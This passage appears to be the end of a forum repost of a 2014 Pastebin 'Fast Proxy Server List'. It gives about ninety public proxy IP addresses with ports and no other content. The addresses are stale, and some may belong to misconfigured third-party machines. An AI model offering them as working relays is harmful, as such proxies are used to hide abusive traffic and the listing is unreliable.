58.64.130.14:8080 58.64.130.18:8080 58.96.168.83:9999 59.115.10.115:9064 59.12.160.20:3128 59.151.103.14:80 59.151.103.15:80 59.188.252.249:3128 59.46.72.245:8080 60.12.11.60:808 60.12.69.110:80 60.190.138.151:80 60.207.166.152:80 60.21.132.218:63000 60.213.189.170:3988 60.214.67.86:9999 60.221.253.204:80 60.55.43.74:80 61.133.51.6:9999 61.149.182.102:8080 61.155.169.11:808 61.156.35.2:3128 61.158.173.188:9999 61.163.165.250:9999 61.172.44.138:9999 61.19.114.178:8080 61.19.121.121:3128 61.19.121.154:3128 61.19.30.198:8080 61.19.42.244:8080 61.19.69.252:8080 61.219.16.16:8888 61.223.145.222:9064 61.227.218.171:3128 61.228.146.138:8088 61.228.233.132:9064 61.230.107.88:8088 61.230.21.131:8088 61.234.123.64:8080 61.58.84.209:8088 62.103.107.9:80 62.108.122.173:3128 64.31.22.131:7808 64.31.22.131:8089 64.74.219.86:80 65.49.14.147:3080 65.49.14.147:3128 66.10.94.36:80 66.10.94.36:8080 66.135.118.156:80 66.162.208.10:3128 66.192.33.78:3128 66.192.33.78:8080 67.148.11.168:443 74.253.21.252:8080 74.50.126.248:7808 74.50.126.248:8089 74.50.126.249:7808 74.50.126.249:8089 75.133.69.131:8080 76.76.105.124:3128 78.107.199.67:8080 79.106.108.139:8080 80.82.69.72:3128 83.246.129.250:3128 88.156.27.199:8080 88.198.24.108:3128 89.191.131.243:8080 89.232.139.253:80 89.249.207.65:3128 89.46.101.122:7808 89.46.101.122:8089 91.218.230.152:3128 91.227.93.20:80 91.238.29.192:9999 93.115.8.229:7808 93.115.8.229:8089 93.188.166.85:80 93.85.92.109:3128 93.87.74.182:8080 94.180.115.232:80 94.198.38.20:8080 94.247.174.117:18080 95.167.39.34:8080 95.65.22.132:3128 95.86.133.141:3128 98.103.146.102:80 [/LIST] Sursa: 08-11-14 | Fast Proxy Server List (1655) - Pastebin.com